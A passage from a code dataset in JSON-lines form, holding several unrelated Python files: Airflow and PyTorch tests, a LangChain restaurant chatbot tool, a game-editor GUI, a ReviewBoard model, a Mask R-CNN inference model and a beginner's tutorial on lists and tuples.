    \"\"\"\n == rendered\n )\n\n\ndef test_dag_run_custom_sqla_interface_delete_no_collateral_damage(dag_maker, session):\n interface = DagRunCustomSQLAInterface(obj=DagRun, session=session)\n dag_ids = (f\"test_dag_{x}\" for x in range(1, 4))\n dates = (pendulum.datetime(2023, 1, x) for x in range(1, 4))\n for dag_id, date in itertools.product(dag_ids, dates):\n with dag_maker(dag_id=dag_id) as dag:\n dag.create_dagrun(execution_date=date, state=\"running\", run_type=\"scheduled\")\n dag_runs = session.query(DagRun).all()\n assert len(dag_runs) == 9\n assert len(set(x.run_id for x in dag_runs)) == 3\n run_id_for_single_delete = \"scheduled__2023-01-01T00:00:00+00:00\"\n # we have 3 runs with this same run_id\n assert sum(1 for x in dag_runs if x.run_id == run_id_for_single_delete) == 3\n # each is a different dag\n\n # if we delete one, it shouldn't delete the others\n one_run = next(x for x in dag_runs if x.run_id == run_id_for_single_delete)\n assert interface.delete(item=one_run) is True\n session.commit()\n dag_runs = session.query(DagRun).all()\n # we should have one fewer dag run now\n assert len(dag_runs) == 8\n\n # now let's try multi delete\n run_id_for_multi_delete = \"scheduled__2023-01-02T00:00:00+00:00\"\n # verify we have 3\n runs_of_interest = [x for x in dag_runs if x.run_id == run_id_for_multi_delete]\n assert len(runs_of_interest) == 3\n # and that each is different dag\n assert len(set(x.dag_id for x in dag_runs)) == 3\n\n to_delete = runs_of_interest[:2]\n # now try multi delete\n assert interface.delete_all(items=to_delete) is True\n session.commit()\n dag_runs = session.query(DagRun).all()\n assert len(dag_runs) == 6\n assert len(set(x.dag_id for x in dag_runs)) == 3\n assert len(set(x.run_id for x in dag_runs)) == 3\n","repo_name":"a0x8o/airflow","sub_path":"tests/www/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":13569,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"17516947119","text":"from langchain.tools import BaseTool\nfrom cassandra.cluster import Cluster\nfrom cassandra.auth import PlainTextAuthProvider\nimport streamlit as st\nimport openai\nfrom dotenv import dotenv_values\n\n### parameters #########\nconfig = dotenv_values('conf.env')\nopenai.api_key = config['OPENAI_API_KEY']\nSECURE_CONNECT_BUNDLE_PATH = config['SECURE_CONNECT_BUNDLE_PATH']\nASTRA_CLIENT_ID = config['ASTRA_CLIENT_ID']\nASTRA_CLIENT_SECRET = config['ASTRA_CLIENT_SECRET']\ncloud_config = {\n 'secure_connect_bundle': SECURE_CONNECT_BUNDLE_PATH\n }\nauth_provider = PlainTextAuthProvider(ASTRA_CLIENT_ID, ASTRA_CLIENT_SECRET)\ncluster = Cluster(cloud=cloud_config, auth_provider=auth_provider)\nsession = cluster.connect()\n \n\nclass Waiter(BaseTool):\n name = \"Waiter\"\n description = \"Use this tool as you are waiter and help customers with their order. You need to check what is available in the menu but you can provide concise responses.You also tell the total cost of their order. \"\n\n def _run(self,user_question):\n KEYSPACE_NAME = 'vector'\n TABLE_NAME = 'restaurant'\n model_id = \"text-embedding-ada-002\"\n embedding = openai.Embedding.create(openai_api_key=openai.api_key,input=user_question, model=model_id)['data'][0]['embedding']\n for row in session.execute(f\"SELECT document_id,document,embedding_vector FROM {KEYSPACE_NAME}.{TABLE_NAME} ORDER BY embedding_vector ANN OF {embedding} LIMIT 1\"):\n res = row.document \n\n return res \n\n def _arun(self, query: str):\n raise NotImplementedError(\"This tool does not support async\")\n\n\nclass TotalAmount(BaseTool):\n name = \"TotalAmount\"\n description = \"Use this tool as you are waiter and You can provide concise responses. You don't need to tell each price of the food but you can tell the total cost of the order\"\n \n def _run(self,user_question):\n KEYSPACE_NAME = 'vector'\n TABLE_NAME = 'restaurant'\n model_id = \"text-embedding-ada-002\"\n embedding = openai.Embedding.create(openai_api_key=openai.api_key,input=user_question, model=model_id)['data'][0]['embedding']\n for row in session.execute(f\"SELECT document_id,document,embedding_vector FROM {KEYSPACE_NAME}.{TABLE_NAME} ORDER BY embedding_vector ANN OF {embedding} LIMIT 1\"):\n res = row.document \n\n return res \n\n def _arun(self, query: str):\n raise NotImplementedError(\"This tool does not support async\")","repo_name":"betloreilly/ServAI","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35468040735","text":"from neuralop.losses.data_losses import (\n\tcentral_diff_1d,\n\tcentral_diff_2d)\n\nimport pytest\nimport torch\nimport torch.nn as nn\n\ndef test_torch_roll_works():\n\t\"\"\"\n\thttps://pytorch.org/docs/stable/generated/torch.roll.html\n\ttorch.roll(input, shifts, dims=None) -> Tensor\n\tRoll tensor input along given dimension(s). Elements shifted beyond last\n\tposition are reintroduced at first position. If dims is None, tensor will be\n\tflattened before rolling and then restored to original shape.\n\t\"\"\"\n\tx = torch.tensor([i for i in range(1, 9)]).view(4, 2)\n\tfor i in range(4):\n\t\tfor j in range(2):\n\t\t\tassert x[i, j] == i * 2 + j + 1\n\n\ty = torch.roll(x, 1)\n\tfor i in range(4):\n\t\tfor j in range(2):\n\t\t\tif (i != 0 and j != 0):\n\t\t\t\tassert y[i, j] == i * 2 + j\n\t\t\telse:\n\t\t\t\tassert y[0, 0] == 8\n\n\n\ndef test_torch_roll_itself_does_not_mutate():\n\tx = torch.tensor([i for i in range(1, 9)]).view(4, 2)\n\ty = torch.roll(x, 1, 0)\n\n\tfor i in range(4):\n\t\tfor j in range(2):\n\t\t\tassert x[i, j] == i * 2 + j + 1\n\t\t\tif (i > 0):\n\t\t\t\tassert y[i, j] == (i - 1) * 2 + j + 1\n\t\t\telse:\n\t\t\t\tassert y[i, j] == j + 7\n\n\ty = torch.roll(x, -1, 0)\n\tfor i in range(4):\n\t\tfor j in range(2):\n\t\t\tassert x[i, j] == i * 2 + j + 1\n\t\t\tif (i < 3):\n\t\t\t\tassert y[i, j] == i * 2 + j + 3\n\t\t\telse:\n\t\t\t\tassert y[i, j] == j + 1\n\n\ty = torch.roll(x, shifts=(2, 1), dims=(0, 1))\n\tfor i in range(4):\n\t\tfor j in range(2):\n\t\t\tassert x[i, j] == i * 2 + j + 1\n\t\t\tif (i < 2):\n\t\t\t\tassert y[i, j] == i * 2 - j + 6\n\t\t\telse:\n\t\t\t\tassert y[i, j] == (i - 2) * 2 - j + 2\n\ndef test_torch_l1loss_constructs():\n\t\"\"\"\n\thttps://pytorch.org/docs/stable/generated/torch.nn.L1Loss.html#torch.nn.L1Loss\n\n\ttorch.nn.L1Loss(size_average=None,reduce=None,reduction='mean')\n\tCreates a criterion that measures mean absolute error (MAE) between each\n\telement in input x and target y.\n\n\tOutput: scalar. If reduction is 'none', then (*), same shape as input.\n\t\"\"\"\n\tloss = nn.L1Loss()\n\t# requires_grad=True tells PyTorch to keep track of operations performed on\n\t# that tensor so gradients can be calculated with respect to it.\n\tinput = torch.randn(3, 5, requires_grad=True)\n\ttarget = torch.randn(3, 5)\n\toutput = loss(input, target)\n\toutput.backward()\n\n\tinput = torch.tensor([\n\t\t[float(i + 1 + j * 5) for i in range(5)] for j in range(3)],\n\t\trequires_grad=True)\n\n\ttarget = torch.tensor(\n\t\t[[float(5 * (j + 1) - i) for i in range(5)] for j in range(3)])\n\n\toutput = loss(input, target)\n\tassert output.item() == pytest.approx(2.4)","repo_name":"ernestyalumni/InServiceOfX","sub_path":"ThirdParty/NeuralOperators/IntegrationTests/neuralop/losses/test_data_losses.py","file_name":"test_data_losses.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32380883754","text":"from datetime import datetime\n\nclass Queue:\n def __init__(self):\n self.queue = []\n def enq(self,v):\n self.queue.append(v)\n def isempty(self):\n return(self.queue == [])\n def delq(self):\n v = None\n if not self.isempty():\n v = self.queue[0]\n self.queue = self.queue[1:]\n return(v)\n def __str__(self):\n return(str(self.queue))\n\nl = [['Wes', '12:00:30'],['Michella', '12:03:40'],['Asher', '12:00:01']]\n\n\ndef minl(l):\n for i in range(len(l)):\n d = datetime.strptime(l[i][1],'%H:%M:%S')\n k=i\n for j in range(i+1,len(l)):\n if (datetime.strptime(l[j][1],'%H:%M:%S')= obj.x - obj.w / 2 and x <= obj.x + obj.w / 2 and\n y >= -obj.y - obj.h / 2 and y <= -obj.y + obj.h / 2):\n global selected\n selected = obj\n redrawObjects()\n refreshFields()\n break\n\n## Begins moving the canvas based on the mouse position.\n\n\ndef canvasMoveStart(event):\n selectFromCanvas(event)\n canvas.scan_mark(event.x, event.y)\n\n\ncanvas.bind(\"\", canvasMoveStart)\n\n## Moves the canvas based on the mouse position.\n\n\ndef canvasMouseMove(event):\n canvas.scan_dragto(event.x, event.y, gain=1)\n\n\ncanvas.bind(\"\", canvasMouseMove)\n\n## Deletes the selected game object.\n\n\ndef deleteSelected(key):\n global selected\n if not selected:\n return\n globalObjs.remove(selected)\n selected = None\n refreshAll()\n\n\ncanvas.bind(\"\", deleteSelected)\n\n## Draws the given image to the canvas.\n\n\ndef drawImage(path, obj):\n im = Image.open(os.path.join(getPath()+\"/../Assets/Sprites/\", path)).convert(\n \"RGB\").resize((obj.w, obj.h), resample=Image.BILINEAR)\n sprite = ImageTk.PhotoImage(im)\n spriteStore.append(sprite)\n canvas.create_image(obj.x, -obj.y, image=sprite)\n\n## Redraws all game objects on the canvas.\n\n\ndef redrawObjects():\n app.clearCanvas(canvasTitle)\n spriteStore.clear()\n # axes\n canvas.create_line(-2000, 0, 2000, 0, fill=\"black\")\n canvas.create_line(0, -2000, 0, 2000, fill=\"black\")\n for i in range(-20, 21):\n canvas.create_line(-5, i*100, 5, i*100, fill=\"black\")\n canvas.create_line(i*100, -5, i*100, 5, fill=\"black\")\n\n for obj in globalObjs:\n if (selected and selected == obj):\n canvas.create_rectangle(obj.x - obj.w / 2 - 1, -obj.y - obj.h / 2 - 1,\n obj.x + obj.w / 2 + 1, -obj.y + obj.h / 2 + 1, fill=\"green\")\n elif not obj.spriteName:\n canvas.create_rectangle(obj.x - obj.w / 2, -obj.y - obj.h / 2,\n obj.x + obj.w / 2, -obj.y + obj.h / 2, fill=\"red\")\n if obj.spriteName:\n drawImage(obj.spriteName, obj)\n\n\n\n# |||||||||||| \"Inspector\" Section ||||||||||||\napp.startPanedFrame(\"inspector\")\n\n# Editable parts of object\napp.startFrame(\"fields\", 0, 0)\n## The label for the namefield.\nnameField = \"Name\"\napp.addLabelEntry(nameField, 0, 0, 2, 1)\n## The label for the x coordinate field.\nxField = \"X\"\napp.addLabelNumericEntry(xField, 1, 0)\n## The label for the y coordinate field.\nyField = \"Y\"\napp.addLabelNumericEntry(yField, 1, 1)\n## The label for the width field.\nwField = \"W\"\napp.addLabelNumericEntry(wField, 2, 0)\n## The label for the height field.\nhField = \"H\"\napp.addLabelNumericEntry(hField, 2, 1)\n## The label for the permanent field.\npermanentField = \"Permanent\"\napp.addCheckBox(permanentField, 3, 0)\n\n## The label for the module name field.\nmoduleNameField = \"Module Name\"\nscriptEntry = app.addLabelEntry(moduleNameField, 4, 0, 2, 1)\n## The label for the class name field.\nclassNameField = \"Class Name\"\napp.addLabelValidationEntry(classNameField, 5, 0, 2, 1)\n## The label for the sprite name field.\nspriteNameField = \"Sprite Name\"\napp.addLabelFileEntry(spriteNameField, 6, 0, 2, 1)\n\n## Sets the currently selected game object to be layered one layer up.\n\n\ndef layerUpFunc():\n if not selected:\n return\n for i in range(len(globalObjs)):\n if selected == globalObjs[i] and i != 0:\n temp = globalObjs[i]\n globalObjs[i] = globalObjs[i-1]\n globalObjs[i-1] = temp\n refreshAll()\n break\n\n\n## The label for the layer up name field.\nlayerUp = \"Move Up\"\napp.addNamedButton(layerUp, layerUp, layerUpFunc, 7, 0)\n\n## Sets the currently selected game object to be layered one layer down.\n\n\ndef layerDownFunc():\n if not selected:\n return\n for i in range(len(globalObjs)):\n if selected == globalObjs[i] and i != len(globalObjs)-1:\n temp = globalObjs[i]\n globalObjs[i] = globalObjs[i+1]\n globalObjs[i+1] = temp\n refreshAll()\n break\n\n\n## The label for the layer down name field.\nlayerDown = \"Move Down\"\napp.addNamedButton(layerDown, layerDown, layerDownFunc, 7, 1)\n\napp.stopFrame()\n\napp.setFont(20)\n## The label for the scene hierarchy\nlistBox = \"Scene Hierarchy\"\n## Side list with all objects\nlb = app.addListBox(listBox, [], 1, 0)\nlb.bind(\"\", deleteSelected)\n\napp.stopAllPanedFrames()\n\n## Refreshes all of the fields.\n\n\ndef refreshFields():\n if not selected:\n app.clearEntry(nameField)\n app.clearEntry(xField)\n app.clearEntry(yField)\n app.clearEntry(wField)\n app.clearEntry(hField)\n app.clearEntry(moduleNameField)\n app.clearEntry(classNameField)\n app.clearEntry(spriteNameField)\n app.setCheckBox(permanentField, ticked=False)\n return\n app.setEntry(nameField, selected.name)\n app.setEntry(xField, str(selected.x))\n app.setEntry(yField, str(selected.y))\n app.setEntry(wField, str(selected.w))\n app.setEntry(hField, str(selected.h))\n app.setEntry(moduleNameField, selected.scriptName)\n app.setEntry(classNameField, selected.className)\n actualSpriteName = \"\"\n if(selected.spriteName != \"\" and selected.spriteName != None):\n actualSpriteName = os.path.join(getPath(), selected.spriteName)\n app.setEntry(spriteNameField, actualSpriteName)\n app.setCheckBox(permanentField, ticked=selected.permanent)\n\n## Refreshes the list of game objects.\n\n\ndef refreshList():\n app.clearListBox(listBox)\n for obj in globalObjs:\n app.addListItem(listBox, obj.name)\n\n## Selects a game object from the list.\n\n\ndef selectInList(event):\n if app.getListBox(listBox):\n objName = lb.selection_get()\n for obj in globalObjs:\n if objName == obj.name:\n global selected\n selected = obj\n redrawObjects()\n refreshFields()\n break\n\n\nlb.bind(\"\", selectInList)\nlb.bind(\"\", selectInList)\n\n## Sets the name via name field input.\n\n\ndef setName():\n global selected\n if not selected:\n return\n newName = checkNameDups(app.getEntry(nameField))\n selected.name = newName\n refreshList()\n\n\napp.setEntrySubmitFunction(nameField, setName)\n\n## Sets the x coordinate via x field input.\n\n\ndef setX():\n global selected\n if not selected:\n return\n newX = app.getEntry(xField)\n if(newX == None):\n intX = 0\n else:\n intX = int(newX)\n if selected.x != intX:\n selected.x = intX\n redrawObjects()\n\n\napp.setEntryChangeFunction(xField, setX)\n\n## Sets the y coordinate via y field input.\n\n\ndef setY():\n global selected\n if not selected:\n return\n newY = app.getEntry(yField)\n if(newY == None):\n intY = 0\n else:\n intY = int(newY)\n if selected.y != intY:\n selected.y = intY\n redrawObjects()\n\n\napp.setEntryChangeFunction(yField, setY)\n\n## Sets the width via width field input.\n\n\ndef setW():\n global selected\n if not selected:\n return\n newW = app.getEntry(wField)\n if(newW == None):\n intW = 0\n else:\n intW = int(newW)\n if selected.w != intW:\n selected.w = intW\n redrawObjects()\n\n\napp.setEntryChangeFunction(wField, setW)\n\n## Sets the height via height field input.\n\n\ndef setH():\n global selected\n if not selected:\n return\n newH = app.getEntry(hField)\n if(newH == None):\n intH = 0\n else:\n intH = int(newH)\n if selected.h != intH:\n selected.h = intH\n redrawObjects()\n\n\napp.setEntryChangeFunction(hField, setH)\n\n## Sets the script name via script field input.\n\n\ndef setScriptName():\n global selected\n if not selected:\n return\n newScriptName = app.getEntry(moduleNameField)\n if newScriptName != selected.scriptName:\n selected.scriptName = newScriptName\n\n\napp.setEntryChangeFunction(moduleNameField, setScriptName)\n\n## Sets the class name via class field input.\n\n\ndef setClassName():\n global selected\n if not selected:\n return\n newClassName = app.getEntry(classNameField)\n if newClassName != selected.className:\n selected.className = newClassName\n\n\napp.setEntryChangeFunction(classNameField, setClassName)\n\n## Sets the sprite name via sprite field input.\n\n\ndef setSpriteName():\n global selected\n if not selected:\n return\n newSpriteName = app.getEntry(spriteNameField)\n if(newSpriteName != \"\" and newSpriteName != None):\n actualSpriteName = os.path.basename(newSpriteName)\n else:\n actualSpriteName = newSpriteName\n if actualSpriteName != selected.spriteName:\n selected.spriteName = actualSpriteName\n redrawObjects()\n\n\napp.setEntryChangeFunction(spriteNameField, setSpriteName)\n\n## Sets the permanent field via permanent field input.\n\n\ndef setPermanentField():\n global selected\n if not selected:\n return\n selected.permanent = app.getCheckBox(permanentField)\n\n\napp.setCheckBoxChangeFunction(permanentField, setPermanentField)\n\n## Refreshes everything.\n\n\ndef refreshAll():\n refreshList()\n refreshFields()\n redrawObjects()\n\n\nrefreshAll()\napp.go()\n","repo_name":"trevday/eternal2d-engine","sub_path":"Engine/Eternal2D/Editor/eternal2Deditor.py","file_name":"eternal2Deditor.py","file_ext":"py","file_size_in_byte":14142,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"28181543699","text":"#Python内置的一种数据类型是列表:list。list是一种有序的集合,可以随时添加和删除其中的元素。\nclassmates = ['Michael', 'Bob', 'Tracy']\n#变量classmates就是一个list。用len()函数可以获得list元素的个数:\nprint(len(classmates))\n#用索引来访问list中每一个位置的元素,记得索引是从0开始的:\nprint(classmates[0]) #Michael\n#如果要取最后一个元素,除了计算索引位置外,还可以用-1做索引,直接获取最后一个元素:\nprint(classmates[-1]) # Tracy\n#以此类推,可以获取倒数第2个、倒数第3个:\n\n#list是一个可变的有序表,所以,可以往list中追加元素到末尾:\nclassmates.append(\"Adam\")\nclassmates.insert(1,\"Jack\")\n#要删除list末尾的元素,用pop()方法:\nclassmates.pop()\n#要删除指定位置的元素,用pop(i)方法,其中i是索引位置:\nclassmates.pop(1)\n#要把某个元素替换成别的元素,可以直接赋值给对应的索引位置:\nclassmates[1] = 'Sarah'\n#list里面的元素的数据类型也可以不同,比如:\nL = ['Apple', 123, True]\ns = ['python', 'java', ['asp', 'php'], 'scheme']\n\n#tuple\n#另一种有序列表叫元组:tuple。tuple和list非常类似,但是tuple一旦初始化就不能修改,比如同样是列出同学的名字:\n\nclassmates = ('Michael', 'Bob', 'Tracy')\n#现在,classmates这个tuple不能变了,它也没有append(),insert()这样的方法。其他获取元素的方法和list是一样的,你可以正常地使用classmates[0],classmates[-1],但不能赋值成另外的元素。\n#定义的不是tuple,是1这个数!这是因为括号()既可以表示tuple,又可以表示数学公式中的小括号,这就产生了歧义,因此,Python规定,这种情况下,按小括号进行计算,计算结果自然是1。\n#所以,只有1个元素的tuple定义时必须加一个逗号,,来消除歧义:\nt = (1,)\n#理论上tuple不可变,但是在一些特定的情况下可以变化(实际变的不是tuple)\nt = ('a', 'b', ['A', 'B'])\nt[2][0] = 'X'\nt[2][1] = 'Y'\nprint(t) # ('a', 'b', ['X', 'Y'])\n\n#表面上看,tuple的元素确实变了,但其实变的不是tuple的元素,而是list的元素。tuple一开始指向的list并没有改成别的list,所以,tuple所谓的“不变”是说,tuple的每个元素,指向永远不变。即指向'a',就不能改成指向'b',\n#指向一个list,就不能改成指向其他对象,但指向的这个list本身是可变的!\n#理解了“指向不变”后,要创建一个内容也不变的tuple怎么做?那就必须保证tuple的每一个元素本身也不能变。\n\n\n#练习:请用索引取出下面list的指定元素:\nL = [\n ['Apple', 'Google', 'Microsoft'],\n ['Java', 'Python', 'Ruby', 'PHP'],\n ['Adam', 'Bart', 'Lisa']\n]\n\nprint(\"打印Apple:%s\" % L[0][0])\nprint('打印Python: %s' % L[1][1])\nprint(\"打印Lisa: %s\" % L[2][2])","repo_name":"luyanjie/maomaochong","sub_path":"learn-python3/samples/basic/ListTuple.py","file_name":"ListTuple.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37127604073","text":"from ohmysportsfeedspy import MySportsFeeds\nimport datetime\n\n\nmsf = MySportsFeeds(version='2.1',verbose=True)\nmsf.authenticate(\"API KEY\", \"MYSPORTSFEEDS\")\n\n\n# Pull CSV from My Sports Feeds API\nyear = 2016\ndays = [datetime.datetime(year, 4, 3) + datetime.timedelta(days=i) for i in range(183)]\ngame_date = [day.strftime(\"%Y%m%d\") for day in days]\n\n\nfor day in game_date:\n\toutput = msf.msf_get_data(league='mlb',season=str(year)+'-regular',feed='daily_player_gamelogs' ,format='json', date=day, fordate=day)\n","repo_name":"chrism1148/my_sports_feeds_mlb","sub_path":"get_mlb_gamelog.py","file_name":"get_mlb_gamelog.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"47023169758","text":"import os\n\nfrom django.conf import settings\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom reviewboard.attachments.mimetypes import MIMETYPE_ICON_ALIASES\n\n\nclass FileAttachment(models.Model):\n \"\"\"A file associated with a review request.\n\n Like diffs, a file can have comments associated with it.\n These comments are of type :model:`reviews.FileComment`.\n \"\"\"\n caption = models.CharField(_(\"caption\"), max_length=256, blank=True)\n draft_caption = models.CharField(_(\"draft caption\"),\n max_length=256, blank=True)\n file = models.FileField(_(\"file\"),\n upload_to=os.path.join('uploaded', 'files',\n '%Y', '%m', '%d'))\n mimetype = models.CharField(_('mimetype'), max_length=256, blank=True)\n\n @property\n def filename(self):\n \"\"\"Returns the filename for display purposes.\"\"\"\n return os.path.basename(self.file.name)\n\n @property\n def icon_url(self):\n \"\"\"Returns the icon URL for this file.\"\"\"\n if self.mimetype in MIMETYPE_ICON_ALIASES:\n name = MIMETYPE_ICON_ALIASES[self.mimetype]\n else:\n category = self.mimetype.split('/')[0]\n name = self.mimetype.replace('/', '-')\n\n mimetypes_dir = os.path.join(settings.MEDIA_ROOT, 'rb', 'images',\n 'mimetypes')\n\n if not os.path.exists(os.path.join(mimetypes_dir, name + '.png')):\n name = category + '-x-generic'\n\n if not os.path.exists(os.path.join(mimetypes_dir,\n name + '.png')):\n # We'll just use this as our fallback.\n name = 'text-x-generic'\n\n return '%srb/images/mimetypes/%s.png?%s' % \\\n (settings.MEDIA_URL, name, settings.MEDIA_SERIAL)\n\n def __unicode__(self):\n return self.caption\n\n def get_review_request(self):\n try:\n return self.review_request.all()[0]\n except IndexError:\n try:\n return self.inactive_review_request.all()[0]\n except IndexError:\n # Maybe it's on a draft.\n try:\n draft = self.drafts.get()\n except ReviewRequestDraft.DoesNotExist:\n draft = self.inactive_drafts.get()\n\n return draft.review_request\n\n def get_absolute_url(self):\n return self.file.url\n","repo_name":"chazy/reviewboard","sub_path":"reviewboard/attachments/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"6962767088","text":"import numpy as np\nimport tensorflow as tf\nimport keras\nimport keras.backend as K\nimport keras.layers as KL\nimport keras.engine as KE\nimport keras.models as KM\nfrom mrcnn.model import build_fpn_mask_graph, DetectionLayer, resnet_graph, build_rpn_model, ProposalLayer, fpn_classifier_graph\nfrom mrcnn.config import Config\nfrom mrcnn import model as modellib, utils\n\nclass InferenceModel(modellib.MaskRCNN):\n def __init__(self, config, model_dir):\n super().__init__('nobuild', config, model_dir)\n self.keras_model = self.build(config=config)\n\n def build(self, config):\n \"\"\"Build Mask R-CNN architecture.\n input_shape: The shape of the input image.\n mode: Either \"training\" or \"inference\". The inputs and\n outputs of the model differ accordingly.\n \"\"\"\n\n # Image size must be dividable by 2 multiple times\n h, w = config.IMAGE_SHAPE[:2]\n if h / 2**6 != int(h / 2**6) or w / 2**6 != int(w / 2**6):\n raise Exception(\"Image size must be dividable by 2 at least 6 times \"\n \"to avoid fractions when downscaling and upscaling.\"\n \"For example, use 256, 320, 384, 448, 512, ... etc. \")\n\n # Inputs\n input_image = KL.Input(\n shape=config.IMAGE_SHAPE, name=\"input_image\")\n\n test_img = np.zeros(config.IMAGE_SHAPE)\n _, image_metas, _ = self.mold_inputs([test_img])\n #input_image_meta = KL.Input(tensor=K.constant(image_metas, name=\"input_image_meta\"))\n input_image_meta = KL.Lambda(lambda x:K.constant(image_metas, name=\"input_image_meta\"))(input_image)\n #input_image_meta = KL.Input(shape=[config.IMAGE_META_SIZE],\n # name=\"input_image_meta\")\n\n # Anchors\n anchors = self.get_anchors(self.config.IMAGE_SHAPE)\n # Duplicate across the batch dimension because Keras requires it\n # TODO: can this be optimized to avoid duplicating the anchors?\n anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)\n\n # Anchors in normalized coordinates\n #input_anchors = KL.Input(tensor=K.constant(anchors, name=\"input_anchors\"))\n input_anchors = KL.Lambda(lambda x:K.constant(anchors, name=\"input_anchors\"))(input_image)\n\n # Build the shared convolutional layers.\n # Bottom-up Layers\n # Returns a list of the last layers of each stage, 5 in total.\n # Don't create the thead (stage 5), so we pick the 4th item in the list.\n if callable(config.BACKBONE):\n _, C2, C3, C4, C5 = config.BACKBONE(input_image, stage5=True,\n train_bn=config.TRAIN_BN)\n else:\n _, C2, C3, C4, C5 = resnet_graph(input_image, config.BACKBONE,\n stage5=True, train_bn=config.TRAIN_BN)\n # Top-down Layers\n # TODO: add assert to verify feature map sizes match what's in config\n P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c5p5')(C5)\n P4 = KL.Add(name=\"fpn_p4add\")([\n KL.UpSampling2D(size=(2, 2), name=\"fpn_p5upsampled\")(P5),\n KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c4p4')(C4)])\n P3 = KL.Add(name=\"fpn_p3add\")([\n KL.UpSampling2D(size=(2, 2), name=\"fpn_p4upsampled\")(P4),\n KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c3p3')(C3)])\n P2 = KL.Add(name=\"fpn_p2add\")([\n KL.UpSampling2D(size=(2, 2), name=\"fpn_p3upsampled\")(P3),\n KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c2p2')(C2)])\n # Attach 3x3 conv to all P layers to get the final feature maps.\n P2 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p2\")(P2)\n P3 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p3\")(P3)\n P4 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p4\")(P4)\n P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p5\")(P5)\n # P6 is used for the 5th anchor scale in RPN. Generated by\n # subsampling from P5 with stride of 2.\n P6 = KL.MaxPooling2D(pool_size=(1, 1), strides=2, name=\"fpn_p6\")(P5)\n\n # Note that P6 is used in RPN, but not in the classifier heads.\n rpn_feature_maps = [P2, P3, P4, P5, P6]\n mrcnn_feature_maps = [P2, P3, P4, P5]\n\n # Anchors\n anchors = input_anchors\n\n # RPN Model\n rpn = build_rpn_model(config.RPN_ANCHOR_STRIDE,\n len(config.RPN_ANCHOR_RATIOS), config.TOP_DOWN_PYRAMID_SIZE)\n # Loop through pyramid layers\n layer_outputs = [] # list of lists\n for p in rpn_feature_maps:\n layer_outputs.append(rpn([p]))\n # Concatenate layer outputs\n # Convert from list of lists of level outputs to list of lists\n # of outputs across levels.\n # e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]\n output_names = [\"rpn_class_logits\", \"rpn_class\", \"rpn_bbox\"]\n outputs = list(zip(*layer_outputs))\n outputs = [KL.Concatenate(axis=1, name=n)(list(o))\n for o, n in zip(outputs, output_names)]\n\n rpn_class_logits, rpn_class, rpn_bbox = outputs\n\n # Generate proposals\n # Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates\n # and zero padded.\n proposal_count = config.POST_NMS_ROIS_INFERENCE\n rpn_rois = ProposalLayer(\n proposal_count=proposal_count,\n nms_threshold=config.RPN_NMS_THRESHOLD,\n name=\"ROI\",\n config=config)([rpn_class, rpn_bbox, anchors])\n\n\n\n # Network Heads\n # Proposal classifier and BBox regressor heads\n mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\\\n fpn_classifier_graph(rpn_rois, mrcnn_feature_maps, input_image_meta,\n config.POOL_SIZE, config.NUM_CLASSES,\n train_bn=config.TRAIN_BN,\n fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)\n\n # Detections\n # output is [batch, num_detections, (y1, x1, y2, x2, class_id, score)] in\n # normalized coordinates\n detections = DetectionLayer(config, name=\"mrcnn_detection\")(\n [rpn_rois, mrcnn_class, mrcnn_bbox, input_image_meta])\n\n # Create masks for detections\n detection_boxes = KL.Lambda(lambda x: x[..., :4])(detections)\n mrcnn_mask = build_fpn_mask_graph(detection_boxes, mrcnn_feature_maps,\n input_image_meta,\n config.MASK_POOL_SIZE,\n config.NUM_CLASSES,\n train_bn=config.TRAIN_BN)\n model = KM.Model(input_image,\n [detections, mrcnn_class, mrcnn_bbox,\n mrcnn_mask, rpn_rois, rpn_class, rpn_bbox],\n name='mask_rcnn')\n\n # Add multi-GPU support.\n #if config.GPU_COUNT > 1:\n # from mrcnn.parallel_model import ParallelModel\n # model = ParallelModel(model, config.GPU_COUNT)\n\n return model","repo_name":"pchataignier/masters","sub_path":"Movidius/InferenceModel.py","file_name":"InferenceModel.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30617543106","text":"# ============================================================================\n# test_for_firing_without_dendrites.py\n#\n# created 03 Octoberber 2017 Lungsi\n# modified \n#\n# Use case:\n# o first import the test\n# from cerebunit.validation_tests.cells.PurkinjeCell\n# import NoDendritesTest as noDendtest\n# o experimental_data is the loaded json data wrapped\n# with python quantities. This is 